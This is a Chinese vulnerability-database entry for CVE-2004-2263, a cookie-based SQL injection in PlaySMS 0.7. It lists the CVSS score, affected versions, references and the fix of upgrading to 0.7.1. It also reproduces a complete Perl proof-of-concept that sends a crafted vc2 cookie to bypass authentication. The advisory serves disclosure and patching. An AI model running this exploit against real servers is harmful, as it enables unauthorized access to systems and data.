CVE-2004-2263
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:43:38
NMCOE    

[原文]SQL injection vulnerability in the valid function in fr_left.php in PlaySMS 0.7 and earlier allows remote attackers to modify SQL statements via the vc2 cookie.


[CNNVD]PlaySMS Cookie SQL注入漏洞(CNNVD-200412-376)

        
        Anton Raharja PlaySMS是SMS网关应用处理用于处理单个或广播SMS消息。
        PlaySMS对用户输入缺少充分过滤,远程攻击者可以利用这个漏洞执行任意SQL命令绕过验证。
        PlaySMS包含的valid()函数对用户提交的COOKIES数据缺少充分过滤,如果服务器"magic_quotes_gpc"设置为'off'的情况下,远程用户可以提供特殊构建的COOKIE值来执行SQL命令,导致未授权访问系统。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:playsms:playsms:0.6
cpe:/a:playsms:playsms:0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2263
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2263
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-376
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/17031
(PATCH)  XF  playsms-valid-sql-injection(17031)
http://www.securityfocus.com/bid/10970
(PATCH)  BID  10970
http://www.osvdb.org/8984
(PATCH)  OSVDB  8984
http://sourceforge.net/project/shownotes.php?release_id=254915
(PATCH)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=254915
http://securitytracker.com/id?1010984
(PATCH)  SECTRACK  1010984
http://www.securiteam.com/unixfocus/5UP0F2ADPS.html
(VENDOR_ADVISORY)  MISC  http://www.securiteam.com/unixfocus/5UP0F2ADPS.html

- 漏洞信息

PlaySMS Cookie SQL注入漏洞
高危 输入验证
2004-12-31 00:00:00 2006-09-23 00:00:00
远程  
        
        Anton Raharja PlaySMS是SMS网关应用处理用于处理单个或广播SMS消息。
        PlaySMS对用户输入缺少充分过滤,远程攻击者可以利用这个漏洞执行任意SQL命令绕过验证。
        PlaySMS包含的valid()函数对用户提交的COOKIES数据缺少充分过滤,如果服务器"magic_quotes_gpc"设置为'off'的情况下,远程用户可以提供特殊构建的COOKIE值来执行SQL命令,导致未授权访问系统。
        

- 公告与补丁

        厂商补丁:
        PlaySMS
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级版本PlaySMS 0.7.1版本:
        
        http://playsms.sourceforge.net/web/

- 漏洞信息 (404)

PlaySMS <= 0.7 SQL Injection Exploit (EDBID:404)
linux remote
2004-08-19 Verified
0 Noam Rathaus
N/A [点击下载]
#!/usr/bin/perl 
# PlaySMS version 0.7 and prior SQL Injection PoC 
# Written by Noam Rathaus of Beyond Security Ltd. 
# 

use IO::Socket; 
use strict; 

my $host = $ARGV[0]; 

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); 

unless ($remote) { die "cannot connect to http daemon on $host" } 

print "connected "; 

$remote->autoflush(1); 

my $http = "GET /~playsms/fr_left.php HTTP/1.1 
Host: $host:80 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 
Firefox/0.9.1 
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
Accept-Language: en-us,en;q=0.5 
Accept-Encoding: gzip,deflate 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 
Keep-Alive: 300 
Cookie: vc1=ticket; vc2='%20union%20select%20'ticket; 
Content-Type: application/x-www-form-urlencoded 
Connection: close 

"; 

print "HTTP: [$http] "; 
print $remote $http; 
sleep(1); 
print "Sent "; 

while (<$remote>) 
{ 
print $_; 
} 
print " "; 

close $remote; 

# milw0rm.com [2004-08-19]
		

- 漏洞信息

8984
PlaySMS Cookie SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

PlaySMS contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that if the magic_quotes_gpc option is disabled, the "vc2" variable in the cookie is not verified properly and will allow an attacker to inject or manipulate SQL queries. (NOTE: Note that setting "magic_quotes_gpc" to "Off" is discouraged by the author of the program in the INSTALL file).

- 时间线

2004-08-18 Unknow
2004-08-18 Unknow

- 解决方案

Upgrade to version 0.7.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站